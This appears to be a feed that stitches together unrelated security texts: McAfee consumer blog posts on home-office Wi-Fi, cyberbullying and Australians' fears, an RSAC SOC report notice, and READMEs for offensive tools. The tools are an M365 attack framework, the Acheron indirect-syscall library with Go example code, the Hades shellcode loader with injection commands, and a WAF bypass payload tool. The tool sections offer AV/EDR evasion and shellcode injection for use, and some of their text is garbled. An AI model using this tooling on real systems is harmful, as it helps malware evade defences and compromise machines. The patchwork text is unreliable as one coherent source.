Wi-Fi networks that are not password protected invite anyone off the street to surf on your network and eavesdrop on your online activities. A stranger sneaking on to your home Wi-Fi could be dangerous to your workplace. There would be very little stopping a stranger from spying on your connected work devices and spreading confidential information onto the dark web or leaking company secrets to the media.
There are a few steps you can take to secure your home office’s internet connection. First, make sure to change the default name and password of your router. Follow password best practices to create a strong first defense. For your router name, choose an obscure inside joke or a random pairing of nouns and adjectives. It’s best to omit your address and your real name as the name of your router, because that could alert a cybercriminal that that network belongs to you. Better yet, you can hide your router completely from strangers and only make it searchable to people who know the exact name of your network.
For an additional layer of protection, connect to a virtual private network (VPN). Your company may offer a corporate VPN. If not, signing up for your own VPN is easy. A VPN encrypts the traffic coming in and going out of your devices making it nearly impossible for a cybercriminal to burst into your online session and see what’s on your screen.
The scenarios outlined in your company’s security training may seem far-fetched, but the concepts of those boring corporate videos actually happen! For example, the huge Colonial Pipeline breach in 2021 originated from one employee who didn’t secure the company’s VPN with multifactor authentication (MFA).2 Cutting small corners like disabling MFA – which is such a basic and easy-to-use security measure – can have dire consequences.
Pay attention to your security training and make sure to follow all company cybersecurity rules and use security tools as your IT team intends. For example, if your company requires that everyone use a password manager, a corporate VPN, and multi-factor authentication, do so! And use them correctly every workday!
These tips are essential to a secure home office, but they’re also applicable to when you’re off the clock. Password- or passcode-protecting your personal laptop, smartphone, and tablet keeps prying eyes out of your devices, which actually hold more personally identifiable information (PII) than you may think. Password managers, a secure router, VPNs, and safe browsing habits will go a long way toward maintaining your online privacy.
To fill in the cracks to better protect your home devices and your PII, partner with McAfee+. McAfee+ includes a VPN, safe browsing tool, identity monitoring and remediation services, a password manager, and more for a more secure digital life.
In one global survey, 68% of people prefer hybrid work models, and nearly three-quarters of companies allow employees to work from home some of the time.3,4 The flexibility afforded by hybrid work and 100% work-from-home policies is amazing. Cutting out the time and cost of commuting five days a week is another bonus. Let’s make at-home work a lasting and secure way of professional life!
1McKinsey Global Institute, “How hybrid work has changed the way people work, live, and shop”
2The Hacker News, “Hackers Breached Colonial Pipeline Using Compromised VPN Password”
3World Economic Forum, “Hybrid working: Why there’s a widening gap between leaders and employees”
4International Foundation of Employee Benefit Plans, “Employee Benefits Survey: 2022 Results”
The post The Future of Work: How Technology & the WFH Landscape Are Making an Impact appeared first on McAfee Blog.
More than half of children say that a cyberbully targeted them online.
That disquieting stat comes from our recent global research on cyberbullying. Overall, 57% of children said they were cyberbullied during the school year. Meanwhile, many parents remain in the dark. Only 42% of parents worldwide said they were aware that their child was bullied online. A distinct awareness gap.
And in the wake of those attacks, the risk of emotional and even physical harm follows.
That’s why talking about cyberbullying is so vital. It acknowledges that cyberbullying remains a fact of life for children today. Moreover, it gives families the tools to spot it—and help heal any harm that comes along with it.
Here, we’ll share some points that can help spark that conversation at home. We’ll look at what cyberbullying is, its signs, its trends, and the steps you can take if someone you know is getting bullied online.
“I know it when I see it” only goes so far when it comes to spotting cyberbullying. A clear definition helps far more than that. StopBullying.gov defines it as:
… [B]ullying that takes place over digital devices like cell phones, computers, and tablets. Cyberbullying can occur through SMS, text, and apps, or online in social media, forums, or gaming where people can view, participate in, or share content. Cyberbullying includes sending, posting, or sharing negative, harmful, false, or mean content about someone else. It can include sharing personal or private information about someone else causing embarrassment or humiliation. Some cyberbullying crosses the line into unlawful or criminal behavior.
Moreover, it can also include sending explicit images or messages and exclusion from group chats and conversations as well. Exclusion is an important point and sometimes gets overlooked in conversations about cyberbullying. As we’ll see, children reported it as one of the top three forms of cyberbullying they’ve experienced.
It’s no secret that children hide their online activities from their parents. Our research puts a number to that. More than half of children (59%) take some action to hide what they’re up to online. As an adult, that means you might not see the offending text, post, or content yourself. More likely, you will spot a change in behavior.
Sadness and depression commonly appear in victims. This can manifest itself in several ways, including the following signs as called out by WebMD:
In all, spotting cyberbullying involves more than keeping an eye on a child’s phone. Importantly, it calls for keeping an eye on the child.
With an understanding of what cyberbullying is, let’s look at what’s happening online.
Based on our research, children reported that name-calling, exclusion, and rumormongering were the top three forms of cyberbullying.
Also making troubling appearances in the list, by percentage:
Also uncovered in our research, sometimes the cyberbully is our own child. Among children worldwide, 19% admitted to cyberbullying another child. However, follow-up questions revealed that 53% of children admitted to one or more acts that constitute cyberbullying. Among the top responses:
With that, some children indeed cyberbully others yet remain unaware that they’re doing it. Note that exclusion appears again as one of the top three offenders, such as where children shut out others in group texts and chats.
Even in its mildest of forms, cyberbullying can lead to emotional harm. Potentially to physical harm as well.
For one, a victim of cyberbullying will likely never view the internet the same way again. An attack on a person’s digital identity is an attack on their personal identity. Both of those identities can suffer.
Children seem to agree. More than one in three (34%) said that they have deleted a social media account to avoid cyberbullying. Nearly as many children hide the hurt. Only 33% said that they sought help with cyberbullying.
This can impact mental health. Faced with a constant barrage of insults and harassment, victims of cyberbullying often grapple with negative thoughts, insecurity, and even depression after their attacks occur. In fact, according to research conducted at Penn State University, 30% of individuals who were cyberbullied turned toward self-harming behaviors and began having suicidal thoughts.
In response, 18% of parents said that they turned to therapy for support when their child was cyberbullied. Another 11% said that they took the further step of changing their child’s school because of cyberbullying. Indeed, cyberbullying can leave an indelible mark on the lives of victims and their families.
Whatever form it takes, the best way to deal with cyberbullying is to deal with it immediately.
Harassment and threats in their more extreme expressions can leave emotional scars. Victims might need support in the wake of them, possibly from a professional. You and your judgment will know what’s best here, yet given the harm it can cause, keep an eye for signs of lasting effects such as the ones mentioned above.
If you’re unsure of where to turn, you have plenty of resources available that can help start the process. In the U.S., the Department of Health & Human Services has a list of resources available for victims and their families. Likewise, the Canadian government website hosts a list of similar mental health resources, and in the UK the NHS hosts a list of resources as well.
The post Cyberbullying’s Impact on Both Society and Security appeared first on McAfee Blog.
MAAD-AF is an open-source cloud attack tool developed for testing security of Microsoft 365 & Azure AD environments through adversary emulation. MAAD-AF provides security practitioners easy to use attack modules to exploit configurations across different M365/AzureAD cloud-based tools & services.
MAAD-AF is designed to make cloud security testing simple, fast and effective. Through its virtually no-setup requirement and easy to use interactive attack modules, security teams can test their security controls, detection and response capabilities easily and swiftly.
(cd /MAAD-AF)
(./MAAD_Attack.ps1)
Tip: A 'Global Admin' privilege account is recommended to leverage full capabilities of modules in MAAD-AF
Acheron is a library inspired by SysWhisper3/FreshyCalls/RecycledGate, with most of the functionality implemented in Go assembly.
acheron package can be used to add indirect syscall capabilities to your Golang tradecraft, to bypass AV/EDRs that makes use of usermode hooks and instrumentation callbacks to detect anomalous syscalls that don't return to ntdll.dll, when the call transition back from kernel->userland.
The following steps are performed when creating a new syscall proxy instance:
Zw* functionsyscall;ret gadgets in ntdll.dll, to be used as trampolinesIntegrating acheron into your offsec tools is pretty easy. You can install the package with:
go get -u github.com/f1zm0/acheronThen just need to call acheron.New() to create a syscall proxy instance and use acheron.Syscall() to make an indirect syscall for Nt* APIs.
Minimal example:
package main
import (
"fmt"
"unsafe"
"github.com/f1zm0/acheron"
)
func main() {
var (
baseAddr uintptr
hSelf = uintptr(0xffffffffffffffff)
)
// creates Acheron instance, resolves SSNs, collects clean trampolines in ntdll.dlll, etc.
ach, err := acheron.New()
if err != nil {
panic(err)
}
// indirect syscall for NtAllocateVirtualMemory
s1 := ach.HashString("NtAllocateVirtualMemory")
if retcode, err := ach.Syscall(
s1, // function name hash
hSelf, // arg1: _In_ HANDLE ProcessHandle,
uintptr(unsafe.Pointer(&baseAddr)), // arg2: _Inout_ PVOID *BaseAddress,
uintptr(unsafe.Pointer(nil)), // arg3: _In_ ULONG_PTR ZeroBits,
0x1000, // arg4: _Inout_ PSIZE_T RegionSize,
windows.MEM_COMMIT|windows.MEM_RESERVE, // arg5: _In_ ULONG AllocationType,
windows.PAGE_EXECUTE_READWRITE, // arg6: _In_ ULONG Protect
); err != nil {
panic(err)
}
fmt.Printf(
"allocated memory with NtAllocateVirtualMemory (status: 0x%x)\n",
retcode,
)
// ...
}The following examples are included in the repository:
| Example | Description |
|---|---|
| sc_inject | Extremely simple process injection PoC, with support for both direct and indirect syscalls |
| process_snapshot | Using indirect syscalls to take process snapshots with syscalls |
| custom_hashfunc | Example of custom encoding/hashing function that can be used with acheron |
Other projects that use acheron:
Contributions are welcome! Below are some of the things that it would be nice to have in the future:
If you have any suggestions or ideas, feel free to open an issue or a PR.
The name is a reference to the Acheron river in Greek mythology, which is the river where souls of the dead are carried to the underworld.
Note
This project uses semantic versioning. Minor and patch releases should not break compatibility with previous versions. Major releases will only be used for major changes that break compatibility with previous versions.
Warning
This project has been created for educational purposes only. Don't use it to on systems you don't own. The developer of this project is not responsible for any damage caused by the improper usage of the library.
This project is licensed under the MIT License - see the LICENSE file for details
Hades is a proof of concept loader that combines several evasion technques with the aim of bypassing the defensive mechanisms commonly used by modern AV/EDRs.
The easiest way, is probably building the project on Linux using make.
git clone https://github.com/f1zm0/hades && cd hades
makeThen you can bring the executable to a x64 Windows host and run it with .\hades.exe [options].
PS > .\hades.exe -h
'||' '||' | '||''|. '||''''| .|'''.|
|| || ||| || || || . ||.. '
||''''|| | || || || ||''| ''|||.
|| || .''''|. || || || . '||
.||. .||. .|. .||. .||...|' .||.....| |'....|'
version: dev [11/01/23] :: @f1zm0
Usage:
hades -f <filepath> [-t selfthread|remotethread|queueuserapc]
Options:
-f, --file <str> shellcode file path (.bin)
-t, --technique <str> injection technique [selfthread, remotethread, queueuserapc]
Inject shellcode that spawms calc.exe with queueuserapc technique:
.\hades.exe -f calc.bin -t queueuserapc
User-mode hooking bypass with syscall RVA sorting (NtQueueApcThread hooked with frida-trace and custom handler)
Instrumentation callback bypass with indirect syscalls (injected DLL is from syscall-detect by jackullrich)
In the latest release, direct syscall capabilities have been replaced by indirect syscalls provided by acheron. If for some reason you want to use the previous version of the loader that used direct syscalls, you need to explicitly pass the direct_syscalls tag to the compiler, which will figure out what files needs to be included and excluded from the build.
GOOS=windows GOARCH=amd64 go build -ldflags "-s -w" -tags='direct_syscalls' -o dist/hades_directsys.exe cmd/hades/main.go
Warning
This project has been created for educational purposes only, to experiment with malware dev in Go, and learn more about the unsafe package and the weird Go Assembly syntax. Don't use it to on systems you don't own. The developer of this project is not responsible for any damage caused by the improper use of this tool.
Shoutout to the following people that shared their knowledge and code that inspired this tool:
This project is licensed under the GPLv3 License - see the LICENSE file for details
WAF bypass Tool is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by Nemesida WAF team with the participation of community.
It is forbidden to use for illegal and illegal purposes. Don't break the law. We are not responsible for possible risks associated with the use of this software.
The latest waf-bypass always available via the Docker Hub. It can be easily pulled via the following command:
# docker pull nemesida/waf-bypass
# docker run nemesida/waf-bypass --host='example.com'
# git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
# python3 -m pip install -r /opt/waf-bypass/requirements.txt
# python3 /opt/waf-bypass/main.py --host='example.com'
'--proxy' (--proxy='http://proxy.example.com:3128') - option allows to specify where to connect to instead of the host.
'--header' (--header 'Authorization: Basic YWRtaW46YWRtaW4=' --header 'X-TOKEN: ABCDEF') - option allows to specify the HTTP header to send with all requests (e.g. for authentication). Multiple use is allowed.
'--user-agent' (--user-agent 'MyUserAgent 1/1') - option allows to specify the HTTP User-Agent to send with all requests, except when the User-Agent is set by the payload ("USER-AGENT").
'--block-code' (--block-code='403' --block-code='222') - option allows you to specify the HTTP status code to expect when the WAF is blocked. (default is 403). Multiple use is allowed.
'--threads' (--threads=15) - option allows to specify the number of parallel scan threads (default is 10).
'--timeout' (--timeout=10) - option allows to specify a request processing timeout in sec. (default is 30).
'--json-format' - an option that allows you to display the result of the work in JSON format (useful for integrating the tool with security platforms).
'--details' - display the False Positive and False Negative payloads. Not available in JSON format.
'--exclude-dir' - exclude the payload's directory (--exclude-dir='SQLi' --exclude-dir='XSS'). Multiple use is allowed.
Depending on the purpose, payloads are located in the appropriate folders:
When compiling a payload, the following zones, method and options are used:
Base64, HTML-ENTITY, UTF-16) in addition to the encoding for the payload. Multiple values are indicated with a space (e.g. Base64 UTF-16). Applicable only to for ARGS, BODY, COOKIE and HEADER zone. Not applicable to payloads in API and MFD directories. Not compatible with option JSON.Except for some cases described below, the zones are independent of each other and are tested separately (those if 2 zones are specified - the script will send 2 requests - alternately checking one and the second zone).
For the zones you can use %RND% suffix, which allows you to generate an arbitrary string of 6 letters and numbers. (e.g.: param%RND=my_payload or param=%RND% OR A%RND%B)
You can create your own payloads, to do this, create your own folder on the '/payload/' folder, or place the payload in an existing one (e.g.: '/payload/XSS'). Allowed data format is JSON.
API testing payloads located in this directory are automatically appended with a header 'Content-Type: application/json'.
For MFD (multipart/form-data) payloads located in this directory, you must specify the BODY (required) and BOUNDARY (optional). If BOUNDARY is not set, it will be generated automatically (in this case, only the payload must be specified for the BODY, without additional data ('... Content-Disposition: form-data; ...').
If a BOUNDARY is specified, then the content of the BODY must be formatted in accordance with the RFC, but this allows for multiple payloads in BODY a separated by BOUNDARY.
Other zones are allowed in this directory (e.g.: URL, ARGS etc.). Regardless of the zone, header 'Content-Type: multipart/form-data; boundary=...' will be added to all requests.
NetWitness and Cisco released the third annual Findings Report from the RSA Conference® 2022 Security Operations Center (SOC).
The RSA Conference® SOC analyzes the Moscone Center wireless traffic, which is an open network during the week of the Conference.
The role of the SOC at RSA Conference is an educational exhibit sponsored by NetWitness and Cisco. It has elements of a SOC like you would create to protect an organization. The RSAC SOC coordinated with the Moscone Center Network Operation Center for a SPAN of the network traffic from the Moscone Center wireless network. In the SOC, NetWitness had real time visibility of the traffic traversing the wireless network. Cisco provided automated malware analysis, threat intelligence, DNS visibility and Intrusion Detection; brought together with SecureX.
The goal of the RSAC SOC is to use technology to educate conference attendees about what happens on a typical wireless network. The education comes in the form of daily SOC tours and an RSA Conference® session. You can watch the replay of the ‘EXPOSURE: The 3rd Annual RSAC SOC Report’ session here.
The findings report addresses several security topics, including:
Look forward to seeing you in 2023!
Download the RSA Conference® 2022 Security Operations Center Findings Report here.
Acknowledgements: Our appreciation to those who made the RSAC SOC possible.
Percy Tucker
Steve Fink
Bart Stump
Dave Glover
Jessica Bair Oppenheimer – Cisco SOC Manager
Ian Redden – Team Lead & Integrations
Aditya Sankar / Ben Greenbaum – SecureX & Malware Analytics
Alejo Calaoagan / Christian Clasen – Cisco Umbrella
Dinkar Sharma / Seyed Khadem-Djahaghi – Cisco Secure Firewall
Matt Vander Horst – SecureX Orchestration
Doug Hurd – Partnerships
Eric Kostlan
Navin Sinha
Zohreh Khezri
Eric Goodwin
Gabe Gilligan and the amazing staff at XPO Digital!
We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!
Cisco Secure Social Channels
Fears and phobias. We all have them. But what are your biggest ones? I absolutely detest snakes but spiders don’t worry me at all. Well, new research by McAfee shows that cybercriminals and the fear of being hacked are now the 5th greatest fear among Aussies.
With news of data breaches and hacking crusades filling our news feed on a regular basis, many of us are becoming more aware and concerned about the threats we face in our increasingly digital world. And McAfee’s latest confirms this with hackers making their way into Australia’s Top 10 Fears.
According to research conducted by McAfee, snakes are the top phobia for Aussies followed by spiders, heights and sharks. Cybercriminals and the fear of being hacked come in in 5th place beating the dentist, bees, ghosts, aeroplane travel and clowns!
Aussie Top 10 Fears and Phobias
Fears and phobias develop when we perceive that we are at risk of pain, or worse, still, death. And while almost a third of respondents nominated snakes as their number one fear, there is less than one-in-fifty thousand chance of being bitten badly enough by a snake to warrant going to hospital in Australia, according to research from the Internal Medicine Journal.
In contrast, McAfee’s analysis of more than 108 billion potential online threats between October and December, identified 202 million of these threats as genuine risks. With a global population of 7.5 billion, that means there is approximately a one in 37 chance of being targeted by cybercrime. Now while this is not a life-threatening situation, these statistics show that chance of us being affected by an online threat is very real.
According to the research, 82% of Aussies believe that being hacked is a growing or high concern. And when you look at the sheer number of reported data breaches so far this year, these statistics make complete sense. Data breaches have affected Bunnings staff, Federal Parliament staff, Marriott guests, Victorian Government staff, QLD Fisheries members, Skoolbag app users and Big W customers plus many more.
Almost 1 in 5 (19%) of those interviewed said their top fear at work is doing something that will result in a data security breach, they will leak sensitive information or infect their corporate IT systems.
The fear that we are in the midst of a cyberwar is another big concern for many Aussies. Cyberwar can be explained as a computer or network-based conflict where parties try to disrupt or take ownership of the activities of other parties, often for strategic, military or cyberespionage purposes. 55% of Aussies believe that a cyberwar is happening right now but we just don’t know about it. And a fifth believe cyber warfare is the biggest threat to our nation.
Being proactive about protecting your online life is the absolute best way of reducing the chances of being hacked or being affected by a data breach. Here are my top tips on what you can now to protect yourself:
Using a password manager to create unique and complex passwords for each of your online accounts will definitely improve your online safety. If each on your online accounts has a unique password and you are involved in a breach, the hacker won’t be able to use the stolen password details to log into any of your other accounts.
Storing your financial data within your browser and being able to populate online forms quickly within seconds makes the autofill function very attractive however it is risky. Autofill will automatically fill out all forms on a page regardless of whether you can see all the boxes. You may just think you are automatically entering your email address into an online form however a savvy hacker could easily design an online form with hidden boxes designed to capture your financial information. So remove all your financial information from Autofill. I know this means you will have to manually enter information each time you purchase but your personal data will be better protected.
One of the easiest ways for a cybercriminal to compromise their victim is by using phishing emails to lure consumers into clicking links for products or services that could lead to malware, or a phoney website designed to steal personal information. If the deal seems too good to be true, or the email was not expected, always check directly with the source.
It’s important to put the right security solutions in place in order to surf the web safely. Add an extra layer of security to your browser with McAfee WebAdvisor.
I know public Wi-Fi might seem like a good idea, but if consumers are not careful, they could be unknowingly exposing personal information or credit card details to cybercriminals who are snooping on the network. If you are a regular Wi-Fi user, I recommend investing in a virtual private network or (VPN) such as McAfee Secure VPN which will ensure your connection is completely secure and that your data remains safe.
While it is tempting, putting our head in the sand and pretending hackers and cybercrime don’t exist puts ourselves and our families at even more risk! Facing our fears and making an action plan is the best way of reducing our worry and stress. So, please commit to being proactive about your family’s online security. Draw up a list of what you can do today to protect your tribe. And if you want to receive regular updates about additional ways you can keep your family safe online, check out my blog.
‘till next time.
Alex x
The post Aussies Fear Snakes, Spiders and Getting Hacked appeared first on McAfee Blog.
